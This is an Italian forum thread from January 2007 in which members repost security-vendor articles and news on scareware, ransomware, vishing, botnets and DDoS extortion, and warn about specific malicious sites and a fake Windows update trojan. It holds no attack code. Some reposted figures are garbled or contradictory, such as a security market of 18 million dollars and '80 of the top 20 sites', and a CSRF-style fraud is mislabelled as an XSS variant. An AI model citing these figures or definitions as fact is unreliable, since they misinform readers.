PDA

View Full Version : [Ufficiale]Malware ultima Frontiera


giannola
18-01-2007, 13:56
Ho meditato a lungo prima di scrivere questo post, che vuole proporsi come oppositore ai virus 0day, ovvero in parole semplici cercare e soprattutto cominciare a parlare di nuove tipologie di virus non appena nel mondo si cominciano a diffondere, consapevole del fatto che essendo la rete una prima o poi toccherà farci i conti.
Lancio questo articolo (fonte vnunet.it) come manifesto che meglio esprime le mie idee, ponendo già l'accenno su due nuove categorie di cui non avevo sentito ancora parlare (scareware e ransomware).

Le nuove frontiere del Cybercrime
Durante il workshop organizzato recentemente da Sophos, gli esperti della sicurezza informatica hanno fatto il punto sull’evoluzione delle minacce e degli strumenti per arginarle

Massimo Negrisoli, vnunet 06-novembre-2006.




Advertisement
Il produttore di soluzioni antivirus Sophos ha recentemente organizzato un Workshop focalizzato sull'evoluzione delle minacce It, al quale hanno partecipato numerosi esperti del settore. Approfittando dell'occasione cerchiamo di delineare il nuovo scenario delle minacce alla sicurezza It e i possibili sviluppi del settore.

L'apertura dei lavori è stata affidata ad esponenti di Sophos, che hanno delineato con precisione le caratteristiche assunte dallo scenario che si andava ad analizzare. In particolare, Vito Divincenzo, Sales and Marketing Director di Sophos Italia, ha puntualizzato come oggi ogni reato abbia una componente che coinvolge la tecnologia. Ecco perché è importante approfondire le tematiche relative alla sicurezza. La maggior parte degli atti criminosi attuali ci sta dimostrando che la componente tecnologica sta acquisendo un peso sempre maggiore. Per contrastare questo fenomeno in larghissima diffusione è cruciale impegnarsi nella diffusione di una reale cultura della sicurezza.

Una vita in rete

Il problema legato alla sicurezza informatica è costellato da false convinzioni che contribuiscono ad aumentare il livello di rischio. Molti infatti sono convinti di non correre più rischi nel momento in cui non sono più collegati alla rete. A smentirlo ha contribuito l'intervento di un personaggio storico del settore, Gigi Tagliapietra, Presidente del Clusit, l'Associazione italiana per la sicurezza informatica. Secondo Tagliapietra infatti siamo sempre collegati in Rete. Anche quando spegniamo il nostro PC, ad esempio, la banca continua a effettuare operazioni per nostro conto, ecco perché diventa fondamentale rendersene conto e tutelarsi. Continuamente. Lo scenario della cybercriminalità sta cambiando giorno dopo giorno. Non esiste più l’hacker solitario spinto dalla ricerca della gloria personale, adesso si è passati a vere e proprie associazioni a delinquere che compiono attacchi mirati a scopo di lucro. Bande criminali che mantengono l’anonimato per continuare a perpetrare le loro truffe informatiche. Anche le minacce informatiche si evolvono velocemente e diventano giorno dopo giorno sempre più insidiose. Se una volta poteva bastare l’antivirus di prima generazione, adesso la cura da sola non basta più: serve prevenzione.Dobbiamo imparare a conoscere il nemico. Oggi i cybercrimnali si sono alleati con gli hacker e i virus writer per lanciare malware sempre più devastante e soprattutto economicamente, per loro, fruttuoso.

I danni da violazioni di security sono cresciuti del 45% annuo (ovvero 50 bilioni di dollari) tre volte di più dell’incremento del mercato della sicurezza che ha un volume di 18 milioni di dollari. Il vero rischio è la non consapevolezza della complessità del cybercrime. Anche la sua dinamica sta cambiando, adesso gli attacchi sono zero day, dobbiamo imparare a proteggerci dalle minacce sconosciute.

Il pericolo è ovunque. Ci sono perfino i cybermercenari. É stata scoperta un’ associazione in Russia che per soli 500 dollari vendeva attacchi informatici su commissione. Ma non c’è da stupirsi più di tanto perché la Rete riflette il mondo reale. Anzi se un ladro che fa una rapina in banca ha il 50% di possibilità di essere arrestato per un bottino medio di 20mila dollari, un criminale informatico ha il 20% di possibilità di essere catturato e può guadagnare una media di 300mila dollari. Per capire meglio il profilo dei cybercriminali, il Clusit ha avviato l’ Hacker Profiling Project, per identificare e diffondere il profiling del nuovo hacker”.

A confermare che le semplici protezioni di base non sono più sufficienti e che la difesa deve essere articolata così come lo sono le nuove minacce è stato ribadito anche da Intervento di Walter Narisoni, Security Consultant di Sophos Italia, il quale ha dichiarato: “Il crimine informatico non solo è in forte crescita (180 mila malware identificati ad oggi), ma anche in profonda trasformazione. Se, nel 2005, 1 messaggio su 44 era virale, oggi la percentuale è scesa a 1 su 141, perché gli hacker stanno abbandonando i mass-mailers worms preferendo i Trojan che permettono una maggior possibilità di introiti illeciti.

Tra le nuove minacce, a scopo di lucro, sta crescendo lo Scareware, un malware disegnato appositamente per sfruttare la paura di attacchi informatici. Non produce danni ma spinge a far acquistare una soluzione di protezione che ha il solo scopo di far guadagnare i cybercriminali. In aumento anche il Ransomware, un malware ideato per “rapire” dati criptandoli e restituirli solo dietro pagamento di riscatto.

Neanche il mondo Mac è immune, i primi due virus identificati sono per molti il segnale che arriveranno presto nuove e più insidiose minacce.

Anche lo spam è in aumento ed essendo prevalentemente inviato da computer zombie, ovvero posseduti all’insaputa degli utenti, è difficilmente controllabile.

Se non si protegge il proprio computer, è certo che sarà infettato con una probabilità del 40% già entro i primi 10 minuti (e del 94% in un’ora).

L’utente deve quindi tutelare la propria sicurezza attraverso software anti-virus, patch di sicurezza e firewalls. Oggi i creatori di virus e gli spammer lavorano insieme, e insieme vanno studiati e contrastati. Come fanno i SophosLabs, i centri di analisi e monitoraggio dislocati in tutto il mondo, gli unici che si occupano congiuntamente di virus, spam e di monitoraggio di siti web/Url”

Non solo Internet

Un'altra pericolosa tendenza seguita nelle società che finalmente hanno preso coscenza della necessità di implementare un piano di sicurezza aziendale è quella di concentrare tutti gli sforzi verso l'esterno, trascurando l'intercettazione e la copertura delle minacce interne. Enrico Campagna, Marketing Manager, I.NET durante il suo intervento ha ribadito proprio questo rischio portando ad esempio l'esperienza maturata dalla propria società. Il dato significativo portato in evidenza da Campagna è che oggi oltre il 25% del fatturato di I.Net deriva dalla sicurezza, in risposta al crescente numero di criticità italiane. La domanda crescente riguarda la sicurezza della gestione operativa, ovvero la continuità operativa dei processi aziendali.

Le aziende stanno diventando consapevoli del cambiamento di modi e tempi degli attacchi informatici. Servono regole, governance della sicurezza, perché il pericolo può provenire non solo dall’esterno, ma sempre più spesso nasce all’interno delle organizzazioni. Inoltre anche il perimetro di controllo si è notevolmente allargato, per la flessibilità con cui vengono usate le tecnologie che subiscono continui cambiamenti di stato passando da Business a Consumer e viceversa. Ad esempio è possibile usare il laptop aziendale per altre funzioni: per scaricare video, oppure per collegarsi da un internet cafè, via smart phone, usare pen Usb. I confini Policy Enforcement sono talmente estesi che diventano ingovernabili, ecco perché è sempre più fondamentale la cultura della sicurezza.

Conclusioni

Sophos è fermamente convinta che per contrastare efficacemente le nuove tedenze del Cybercrime è fondamentale sviluppare una Cultura della Sicurezza. E' con questa finalità ch la società ha promosso alcune importanti iniziative in tal senso, e il workshop dal quale parte la discussione sviluppata in questo articolo è solo una delle iniziative programmate.

Un altra interessante iniziativa sviluppata da Sophos è l'edizione di Secured, un giornale che si propone di contribuire a sensibilizzare un vasto pubblico sui problemi connessi alle nuove minacce. I contenuti editoriali sono forniti da un Comitato Scientifico formato da personalità di spicco del mondo della sicurezza informatica provenienti dal mondo dell’Impresa, della PA, dell’analisi, del giornalismo.



spero che questo torni utile a qualcuno (indipendentemente dal fatto che è stato commissionato da un produttore sw av ed in ogni caso una sintesi dello stesso articolo si trova su http://www.ilsole24ore.com/art/SoleOnLine4/Tecnologia%20e%20Business/2006/11/14110_rusconi_sicurezza.shtml?uuid=b93472f8-73bf-11db-85a7-00000e25108c&type=Libero ) e cmq spero quanto prima di aggiungere altre campane.


Links utili:

http://www.ippari.unict.it/infapp/d...ptovirology.pdf (appunti sulla criptovirologia)

http://it.wikipedia.org/wiki/Vishing (per sapere cos'è il vishing)

http://www.viruslist.com/ (per informarsi circa i virus e le loro varianti, molto completo)

http://www.isacaroma.it/ (osservatorio italiano per la sicurezza)

http://vil.nai.com/vil/default.aspx (altro laboratorio di analisi di mcafee)

www.thedailybit.net (emagazine italiano indipendente con ampio risalto alla sicurezza)

http://www.cgisecurity.com/ (per chi opera nel campo della programmazione web potrebbe essere utile questo sito)

http://www.megalab.it/articoli.php?id_canale=2 (sezione sicurezza del sito megalab dove avere informazioni su sw di protezione e nuove minacce).

secunia.com (sito straniero molto utile per conoscere vulnerabilità e cronologia infezioni inviate da vari produttori av.)

wearethechampions
18-01-2007, 13:59
grazie x l'interessante segnalazione

giannola
18-01-2007, 14:17
Attenti al vishing, la truffa su Voip
Operatori di falsi call center chiedono i nostri dati personali e bancari.

[ZEUS News - www.zeusnews.it - 11-09-2006]

Foto di Astin le ClercqDopo il boom negativo del phishing (l'email truffaldina con link a falsi siti bancari che chiedono i nostri dati riservati come il Pin, le coordinate bancarie, i dati della carta di credito) arriva il vishing, contrazione fra Voip e phishing. Grazie al Voip i costi di chiamata si sono ridotti notevolmente; inoltre la gente tende a fidarsi più di un operatore che di siti web.

Il "visher" attiva un account Voip in stile Skype e fa partire un sistema di chiamata automatico che contatta le potenziali vittime. Quando una di queste risponde, il sistema riproduce una registrazione che comunica un qualche problema sul conto bancario o sulla carta di credito e chiede di chiamare un numero per risolverlo. Il numero indicato è il numero Voip del visher: chiamandolo si riceve la richiesta registrata di inserire i propri dati privati.

inoltre http://it.wikipedia.org/wiki/Vishing

giannola
18-01-2007, 14:22
I Websense Security Labs ha rilevato in alcune pagine utente di Myspace la presenza di una serie di video rassomiglianti a quelli utilizzati da Youtube, la cui natura tuttavia è quella di reindirizzare il malcapitato utente, attratto da immagini di natura erotica, nel sito "Yootube.info"

Chiaramente contraffatto per rassomigliare al vero Youtube, il sito contiene al suo interno un serie di pulsanti dal titolo "click here for the full video" (clicca qui per il video completo) che se cliccati aprono un file video Microsoft Windows Media, il quale richiede l’accettazione di una "particolare" licenza per poter avviare la riproduzione delle immagini.

Se accetta si darà il via all’installazione della Zango Cash Toolbar, software classificato da molte società anti-virus come in grado monitorare, controllare e registrare le abitudini di navigazione Internet degli utenti colpiti.

fonte anti-phishing.it

giannola
18-01-2007, 14:26
Venerdì 12 Gennaio 2007

Nel 2007, si assisterà al rafforzamento di una nuova economia mondiale del cybercrimine della quale si sono visti i primi segnali già nel corso del 2006. Essa vedrà la creazione di bande criminali organizzate composte da delinquenti comuni e da hacker e dedite all’acquisto, vendita e scambio di “beni” quali toolkit pronti da usare per sferrare cyber-attacchi o codici maligni in grado di sfruttare vulnerabilità sconosciute dei sistemi e del web. Questo è quanto predicono in questo inizio d’anno gli esperti di Websense, la società specializzata nella sicurezza web e nella protezione da minacce interne ed esterne alle organizzazioni.

Per il 2007, Websense prevede inoltre una escalation delle problematiche di sicurezza legate al Web 2.0 a seguito della disponibilità in massa delle nuove tecnologie mirate a rendere il web sempre più dinamico e interattivo.

Nel 2007, le principali preoccupazioni non saranno più worm e virus veicolati via email. Sarà piuttosto il web in generale, con il suo impiego ubiquitario e dinamico, a costituire il principale vettore di infezioni dal sempre più diffuso e sofisticato codice maligno creato allo scopo di rubare informazioni.

Websense prevede inoltre l’emergere di exploit in grado di vanificare la protezione promessa dalle toolbar anti-phishing e di tecniche sempre migliori per l’occultamento dei tentativi di sottrazione di informazioni e dati riservati, nonchè l’ulteriore evoluzione delle BOT net, ovvero delle reti di computer infetti controllati da remoto dai cybercriminali, che le impiegano per sferrare attacchi contro altri sistemi in rete o compiere azioni illecite.

“Il crimine organizzato ha realizzato che il potenziale di sfruttamento illecito di Internet è ancora enorme. I facili guadagni che le organizzazioni criminali vedono a portata di mano rappresentano uno stimolo eccezionale all’affinamento dei metodi di attacco”, spiega Dan Hubbard, responsabile ricerca di Websense. “Tool ed exploit da usare per il furto di informazioni personali, aziendali e finanziarie sono la merce più interessante per i cybercriminali. Nel 2007, le aziende e le organizzazioni di ogni tipo non potranno più trascurare l’attivazione di misure preventive idonee a sventare la nuova ondata di attacchi mirati e occulti che si profila all’orizzonte”.


Le previsioni di Websense per il 2007

Un sottobosco di economia criminale
Nel 2006, il cyber-crimine ha iniziato ad alzare il tiro. Nel 2007, Websense si aspetta che esso divenga più organizzato ed “efficiente”. In questo contesto di nuova economia criminale, il mercato sommerso del codice finalizzato a sferrare attacchi cosiddetti zero-day (che indirizzano vulnerabilità dei sistemi ancora sconosciute) sarà sempre più vivace. Il che si tradurrà in un aumento e in una maggiore efficacia degli attacchi contro i quali ancora non esistono contromisure mirati a client e server.

Web 2.0: nuova tecnologia, nuovi problemi per la sicurezza
I siti web basati su tecnologia Web 2.0 sono una realtà in crescita, che secondo le stime comprende già l’80 dei primi 20 siti più visitati del web, tra i quali MySpace e Wikipedia. Siti Web 2.0 quali le social network sono particolarmente vulnerabili agli attacchi a causa della natura particolarmente dinamica dei loro contenuti, che ne rende difficile il monitoraggio e la protezione. Sono milioni le vittime potenziali che criminali, spammer e organizzazioni dedite all’adware mirano a raggiungere colpendo tali reti sociali.

Le principali aree di preoccupazione per il Web 2.0:
- Contenuti creati dall’utente: la possibilità sempre maggiore per gli utenti di creare e controllare in modo autonomo contenuti creativi e dinamici accresce i problemi di sicurezza.

- Social Network: l’ampia popolazione di utenti e la possibilità di connettersi l’un l’altro mediante profili e reti farà aumentare le problematiche di sicurezza nell’ambito di tali comunità. Le social network di intrattenimento non saranno però l’unico obiettivo; un altro target appetibile per i cybercriminali sono le reti sociali di persone che si scambiano informazioni e contatti finalizzati alla ricerca di un impiego o allo sviluppo del business.

- Service Oriented Architecture (SOA) e Web Service: Il Web come piattaforma di applicazioni scritte in diversi linguaggi e implementate su diverse piattaforme é diventato realtá, ma l’avvento dei Web Service e dell’interoperabilitá di diversi software e piattaforme condurrà a un aumento dei problemi di sicurezza, poiché un buco di sicurezza attraverso i vari link si propagherá su tutta la catena dei domini coinvolti.

Exploit delle toolbar anti-phishing
Nel 2006, molte note aziende hanno reso disponibili toolbar anti-phishing integrate nel browser, mirate a evidenziare all’utente link e siti sospetti. Websense prevede che alcune di esse saranno oggetto di exploit progettati per disabilitarle e renderle inefficaci nella prevenzione della minaccia phishing.

Miglior occultamento dei dati
Nel 2007, il furto di informazioni perpetrato mediante codice maligno crescerà e i cybercriminali useranno sempre più la crittografia per occultare il codice maligno e bypassare le misure di prevenzione.

Evoluzione delle BOT net
Emergeranno vere e proprie centrali distribuite di comando e controllo delle BOT net e si assisterà sempre più all’impiego di protocolli per il controllo diversi dai tradizionali Internet Relay Chat (IRC) o HTTP. Aumenterà inoltre l’uso della crittografia e la creazione personalizzata di BOT.

--------------------------------------------------------------------------------
www.thedailybit.net

c.m.g
18-01-2007, 16:11
bravo giannola, ottimo lavoro e buone queste segnalazioni!

giannola
18-01-2007, 16:45
bravo giannola, ottimo lavoro e buone queste segnalazioni!
grazie mille, fa sempre piacere essere utili. ;)

c.m.g
18-01-2007, 16:50
grazie mille, fa sempre piacere essere utili. ;)
di niente! ;)

Kars
19-01-2007, 01:59
Tra le nuove minacce, a scopo di lucro, sta crescendo lo Scareware, un malware disegnato appositamente per sfruttare la paura di attacchi informatici. Non produce danni ma spinge a far acquistare una soluzione di protezione che ha il solo scopo di far guadagnare i cybercriminali. In aumento anche il Ransomware, un malware ideato per “rapire” dati criptandoli e restituirli solo dietro pagamento di riscatto.


Non mi pare sono cose nuove. Mi pare che i pericolosissimi Scareware sono i vecchi popup che fanno installare gli antispyware inutili, i Ransomware, mi pare, sono veramente bastardi, ma anche questi non sono nuovissimi e sono per ovvi motivi molto rari.
Quello che voglio dire e' che chi appunto sfrutta di piu' la paura dei virus, degli spyware e degli ultimi arrivati cyberterroristi sono i nostri carissimi amici, symantec e co. Sono su molti punti in disaccordo con questo articolo: "Le nuove frontiere del Cybercrime", mi sembra di sentire il vicedirettore del corriere della sera su matrix. L' articolo successivo di websense continua sullo stesso filone, cito:
"Nel 2007, le aziende e le organizzazioni di ogni tipo non potranno più trascurare l’attivazione di misure preventive idonee a sventare la nuova ondata di attacchi mirati e occulti che si profila all’orizzonte”.
Misure preventive? Ma chi e' che scrive condolezza reich? :D
Ho suonato la mia campana.
ciao




_____
Kars2

W.S.
19-01-2007, 08:09
Kars, hai ragione, nulla di nuovo... per noi.
Tieni presente però che è sempre un bene ricordare a tutti cosa abbiamo di fronte quando parliamo di maleware. Questo post aiuterà sicuramente qualcuno a chiarirsi le idee e ad altri a rinfrescarle.

giannola, ottima iniziativa :)

giannola
19-01-2007, 08:15
Non mi pare sono cose nuove. Mi pare che i pericolosissimi Scareware sono i vecchi popup che fanno installare gli antispyware inutili, i Ransomware, mi pare, sono veramente bastardi, ma anche questi non sono nuovissimi e sono per ovvi motivi molto rari.
Quello che voglio dire e' che chi appunto sfrutta di piu' la paura dei virus, degli spyware e degli ultimi arrivati cyberterroristi sono i nostri carissimi amici, symantec e co. Sono su molti punti in disaccordo con questo articolo: "Le nuove frontiere del Cybercrime", mi sembra di sentire il vicedirettore del corriere della sera su matrix. L' articolo successivo di websense continua sullo stesso filone, cito:
"Nel 2007, le aziende e le organizzazioni di ogni tipo non potranno più trascurare l’attivazione di misure preventive idonee a sventare la nuova ondata di attacchi mirati e occulti che si profila all’orizzonte”.
Misure preventive? Ma chi e' che scrive condolezza reich? :D
Ho suonato la mia campana.
ciao




_____
Kars2

beh io ad esempio non sapevo nemmeno che esistessero adesso invece che so come che esistono e come si comportano sarò in grado anche di riconoscere eventuali nuove varianti.
Credo che come me tanti su questo forum non conoscono l'esistenza di queste forme di malware sia nuove che nuove riedizioni di vecchie tecniche e dunque scopo di questo 3d è allertare gli utenti.

giannola
19-01-2007, 08:19
Gennaio 13th, 2007

Stavo leggendo ieri sera alcune dichiarazioni di David Dagon, ricercatore del Georgia Institute of Technology, il quale afferma che ben l’11% dei pc che sono su internet - stimati intorno ai 650 milioni - è infetto da malware che trasforma i pc in zombie. Si parla dunque di circa 71 milioni di pc.

La situazione è effettivamente grave e non è un inno alla vendita di prodotti antivirus, proprio le società di antivirus dovrebbero essere le prime a rivedere le tecnologie per l’individuazione di queste infezioni. La situazione attuale è che vengono isolati ogni giorno migliaia di nuovi malware, ma altrettanti non vengono neanche visti da lontano. Semplicemente perché è umanamente impossibile riuscire ad analizzare tutte le infezioni, farne un’analisi e rilasciare signature a questo ritmo. Senza considerare che - visto l’attuale trend degli attacchi mirati - alcune infezioni molto diffuse difficilmente vengono identificate in tempo dai laboratori di ricerca, perché non sono infezioni sotto l’occhio di tutti in campo internazionale.

Dall’altra parte, i malware writer si stanno attrezzando sempre più per creare ogni giorno nuovi malware, o varianti offuscate, in modo tale da evitare i controlli dei software antivirus. Sono sempre più frequenti malware offuscati da server, in modo che ogni vittima scarichi una versione differente da altri utenti. La semplice tecnologia di individuazione tramite signature, se non arricchita con altre tecniche, sta facendo sentire le proprie debolezze, intrinseche nella natura stessa della tecnologia.

A che pro dunque questo grande movimento dell’underground in termini di malware? Chiaramente a scopo di lucro. Come ho scritto nel report già disponibile qui, i malware writer hanno capito che è possibile fare soldi con le infezioni, i pc sono dappertutto. E come è possibile fare soldi? Nel report ho parlato di dialer principalmente, la modalità probabilmente più veloce di fare soldi e che investe per la maggior parte l’Italia.

Ma un altro grave problema a livello mondiale sono le botnet. Molti pc vengono infettati da rootkit, backdoor e trojan - i primi solitamente per nascondere i secondi - senza che gli utenti se ne rendano conto. Non parlo di utenti singoli, qualcuno può tranquillamente dire “io non sono infetto, mi preoccupo della difesa del mio pc con un antivirus aggiornato, non vedo tutto questo allarme“. Il problema non è quel singolo utente però, ci sono centinaia di migliaia di pc infetti, aziende, enti, ma anche singoli computer desktop casalinghi, che sono infetti a loro insaputa.
Quei pc entrano a far parte di reti mondiali, reti controllate dai creatori di malware. I pc infetti restano in attesa di comandi, di azioni da eseguire.


Non sono fantascienza le botnet, non è fantascienza questa tecnica di fare soldi. Come è possibile fare soldi con le botnet? Basta immaginare una botnet di pc zombie utilizzata come smtp relay server per mandare spam. Migliaia e migliaia di pc che mandano spam a comando. Oppure i ricatti, il pagamento di “pizzo” virtuale. A dicembre c’erano i saldi, le offerte natalizie di attacchi DDoS. Della serie “compra due attacchi DDoS e il terzo è gratis“, questo è quello che avevano intercettato i laboratori Kaspersky.

Nella società odierna lanciare un attacco DDoS contro una società significa provocare un danno in alcune situazioni anche molto grave. Molte sono le compagnie che fanno del web la fonte principale di reddito e i loro server web devono essere sempre raggiungibili. Lanciare un attacco DDoS contro una di esse e chiedere per esempio un riscatto è una delle tecniche utilizzate.

Un esempio sono stati i continui attacchi DDoS che da fine novembre, dicembre e a tutt’oggi sono stati sferrati contro molti siti web. Alcuni server DNS internazionali, l’hoster italiano Tophost - dove è ospitato anche questo sito - alcuni forum e siti internazionali che si occupano di sicurezza informatica. Ma il caso più eclatante è il sito di gmer, l’autore dell’omonimo scanner antirootkit, uno dei più utilizzati a livello mondiale.


Il sito gmer.net è stato attaccato i primi di Dicembre e tutt’ora è sotto attacco DDoS. É stato cambiato server più volte, e nel giro di poche ore tutti i nuovi server sono stati attaccati. Anche i mirror sono stati attaccati.

Non si parla di un attacco semplice, alcuni gestori hanno riportato oltre quattro milioni di hit, circa 600.000 hit ogni ora. Altri hanno registrato un consumo di banda di circa 87GB in meno di cinque ore. Altri server hanno registrato più 8000 bot contemporaneamente all’attacco. In generale un mix di tecniche di attacco differenti e in alcuni casi difficili da filtrare. Un carico spesso ingestibile per la maggior parte dei server.

Un attacco impossibile da gestire e sferrare se non ci fossero molti pc infetti e controllati da remoto. Una realtà, dunque, che sarebbe sbagliato minimizzare.

Cosa succederebbe se invece del sito di gmer venisse attaccato qualche ente istituzionale, finanziario o governativo?
(pcalsicuro.com)

cos'è una botnet ?

Botnet
Da Wikipedia, l'enciclopedia libera.

Una botnet è una rete di computer collegati ad internet che, a causa di falle nella sicurezza o mancanza di attenzione da parte dell'utente e dell'amministratore di sistema, vengono infettati da virus informatici o trojan i quali consentono ai loro creatori di controllare il sistema da remoto. Questi ultimi possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali.


Modalità di funzionamento e uso

I virus creati per far parte di una botnet, non appena assunto il controllo del sistema, devono poter fornire al proprio autore i dati relativi al sistema infettato. Per fare ciò spesso sfruttano i canali IRC (Internet Relay Chat) e si connettono ad un dato canale, situato su un dato server, il quale spesso è protetto da una password per dare accesso esclusivo all'autore. Tramite il canale di chat l'autore è in grado di controllare contemporaneamente tutti i sistemi infetti collegati al canale (i quali possono essere anche decine di migliaia) e di impartire ordini a questi. Per fare un esempio, con un solo comando potrebbe far partire un attacco DDoS verso un sistema a sua scelta. Le botnet vengono spesso utilizzate anche per altri scopi oltre al DDoS: questi virus sono spesso programmati in modo da spiare il sistema infetto e intercettare password ed altre informazioni utili. Possono anche offrire accesso alle macchine infette tramite backdoor oppure servizi proxy che garantiscono l'anonimato in rete.

giannola
19-01-2007, 08:22
quello appena postato è un articolo utile per riflettere sulle parole di alcuni di noi.
E' la dimostrazione pratica di quanto si diceva a proposito del fatto che l'infezione di uno finisce per riguardare tutti noi perchè la rete è una e non si può ragionare "ognuno per se e Dio per tutti".
Bisogna che ognuno faccia la sua parte come nel caso dell'iniziativa per la lotta allo spam di acyd. ;)

c.m.g
19-01-2007, 09:58
e pensa che c'è in giro chi viaggia in internet senza antivirus!!! :O

black92
19-01-2007, 15:33
e pensa che c'è in giro chi viaggia in internet senza antivirus!!! :O

già, e di gente in giro ce n'è tanta così, credetemi. Lo si può vedere anche qui sul forum :rolleyes: :rolleyes: . A me viene sempre un gran nervoso quando la gente si lamenta dei problemi, non posta nei thread ufficiali e in + non ha nemmeno l'antivirus...bah.. :mbe: :stordita:

wizard1993
19-01-2007, 16:18
tengo costantemente sotto controllo i vari osservatori virus
http://vil.nai.com/vil/Content/v_vul27722.htm

nuovo trojan della famiglia dropper
http://www.viruslist.com/en/viruses/encyclopedia?virusid=40818
il cui più famoso esponente è conosciuto ad alcuni come optix

giannola
19-01-2007, 17:03
Poichè si prevede (ma speriamo che non si avveri) anche un incremento di crittovirus nei prossimi mesi.
Penso che sia utile (considerato anche che se ne parla davvero poco) anche scaricarsi questo pdf dell'università di catania per avere una idea un più chiara sulla crittovirologia, sui virus corazzati, metamorfici, ecc.


http://www.ippari.unict.it/infapp/didattica/appunti/Sicurezza%20dei%20Sistemi%20Informatici%201/gIozzia_Cryptovirology.pdf

buona lettura ;)

W.S.
19-01-2007, 17:10
A me viene sempre un gran nervoso quando la gente si lamenta dei problemi, non posta nei thread ufficiali e in + non ha nemmeno l'antivirus...bah.. :mbe: :stordita:

Anche a me, ma il nervoso mi viene per il motivo opposto. Mi piacerebbe che chiunque potesse navigare tranquillo, anche chi non ha la passione/tempo/voglia di capire come funzionano i computer. Io non so come si pilota un aereo, eppure ogni tanto volo... non so se mi spiego.
So che quello che penso è probabilemte un'utopia, almeno per ora, ma è questo il mondo informatizzato che mi piacerebbe.

c.m.g
19-01-2007, 17:14
certo che siamo proprio messi male su più fronti! :fagiano: :fagiano: :fagiano: :fagiano:

giannola
19-01-2007, 17:28
vi spiegate benissimo, però cercate di restare nel seminato plz :)

In ogni caso il documento che ho letto dà da pensare soprattutto per quel che riguarda le conclusioni.

W.S.
19-01-2007, 19:11
Appunto, son le conclusioni che non mi piacciono, pur condividendole.
Le condivido perchè effettivamente siamo messi talmente male che l'unica soluzione è diventare tutti quantomento "competenti" nel settore sicurezza per evitare i rischi maggiori.
Non mi piace perchè lo trovo assurdo, rischiamo di scaricare tutte le colpe sulla teoria (l'effettiva impossibilità di dimostrare formalmente la sicurezza di un sistema e quindi l'impossibilità di scrivere programmi sicuri) quando invece la STRAGRANDE maggioranza dei bug (senza di essi i virus/maleware vari sarebbero una minaccia estremamente minore) è presente per mancanza di attenzione/tempo da parte di chi sviluppa sw, mancanza magari data dall'obbligo economico di "arrivare prima sul mercato"...
Scusate lo sfogo, ma finchè useremo SW che viene venduto con centinaia di bug conosciuti non patchati per poter vendere prima della concorrenza, affidandoci poi a patch future... bhe non venitemi a dire che è colpa mia che non ho studiato a sufficienza se mi becco un virus.

P.S.: e lo dico in contrasto con i miei interessi visto che senza problemi informatici sarei disoccupato!

giannola
26-01-2007, 11:12
http://www.isacaroma.it/html/newsletter/node/476ù
posto questo che aiuta a fare un sunto di eventuali minacce nuove e future.
In più trovo utile il dodecalogo che per prevenire infezioni.
Spero possa essere utile. ;)

c.m.g
26-01-2007, 22:53
secondo il mio modesto parere questo tread dovrebbe essere messo in rilievo ed essere trattato come una sorta di "bollettino di guerra" da leggere!

juninho85
26-01-2007, 22:56
...
discorso che condivido per filo e per segno ;)

giannola
28-01-2007, 08:09
secondo il mio modesto parere questo tread dovrebbe essere messo in rilievo ed essere trattato come una sorta di "bollettino di guerra" da leggere!

penso proprio che chiederò ai mod se lo possono spostare nella sezione 3d ufficiali, qua rischia di perdersi.

stesio54
28-01-2007, 10:22
ottimo lavoro ;)
tieni aggiornato il primo post inserendo man a mano i link al singolo post dei vari malware ;)
sennò diventa una bolgia ;)

giannola
28-01-2007, 11:09
ottimo lavoro ;)
tieni aggiornato il primo post inserendo man a mano i link al singolo post dei vari malware ;)
sennò diventa una bolgia ;)

grazie a te ed un grazie mille a tutti coloro che hanno già apportato il loro contributo e vorranno contribuire in futuro (o continueranno a farlo) per cercare di diffondere informazioni riguardo alle minacce poco conosciute di eventuale prossima diffusione.

Una piccola mano per arginare in parte il problema significa anche una rete un po più pulita.
E' sempre meglio di niente e se ci aggiungete l'impegno di acyd(con lo spam) e di eraser (con prevx) è già più che qualcosa. ;)

sampei.nihira
28-01-2007, 11:14
Bravo Giannola !!
Non sono itervenuto mai in questo TOPIC (certamente per mia ignoranza !! :D :D ) comunque è stato da me letto più volte !! ;)

giannola
28-01-2007, 11:59
Gira da un pò questo trojan ma ancora nn è molto diffuso.

Essenzialmente si diffonde via email con intestazioni del tipo "Mail Delivery System", "Mail Transaction Failed" e il testo riporta "Mail Server Report" facendo riferimento ad una mail infettata da un virus e inviata da un account del ricevente.

Il testo avvisa di eseguire il security update di Windows in allegato, che in realtà è una versione dello stesso Stration C, e quindi di riavviare.

Cautela dunque: il file ha una estensione .zip, formato inusuale per i download.

giannola
28-01-2007, 12:19
Variante del Cross site scripting (xss)
Usata dagli hacker sui alcuni siti di commercio elettronico e funziona così:
mentre si fanno acquisti l'hacker modifica i dati del modulo per fare l'ordine facendo credere al negozio di essere lui il cliente.
Modifica anche l'indirizzo di consegna, ma non i dati di fatturazione.
In pratica il cliente paga e non gli arriva nemmeno la sua merce e l'hacker ordina invece quello che vuole.

Per utilizzare questo attacco spesso gli hacker sfruttano le implementazioni del server degli script utilizzati dal browser in particolare delle tecnologie web 2.0
(riassunto dalla rivista chip)


http://en.wikipedia.org/wiki/Cross-site_request_forgery

http://www.cgisecurity.com/articles/csrf-faq.shtml

Prudenza quindi anche negli acquisti in rete, verificare sempre che il sito sia sicuro (crittazione a 128bit). ;)

giannola
29-01-2007, 07:36
Attenzione a questi 2 siti che poi puntano allo stesso IP

---italian.eazel.com----
---italian.ircfast.com-----

209.85.60.76

I siti sono civetta e fanno uso di tecniche di ingegneria sociale per far scaricare un malware dell'insolita dimensione di 1 MB.
Notare che i furbacchioni hanno scritto "Scaricare Software - Software esente da virus" :-) :-)

Su virustotal solo 4 lo individuano e sono antivir, drweb, panda, esafe

Gia' ho comunicato la cosa sul blog dell'amico della prevx speiamo che lo aggiunga subito

Ah un altro sito da evitare come la peste bubbonica è

----mprogrammi.net---

ospitato sui server USA intercage, che poi usano il solito script per infettare , il che vuol dire Gromozon/dialcall al 100%


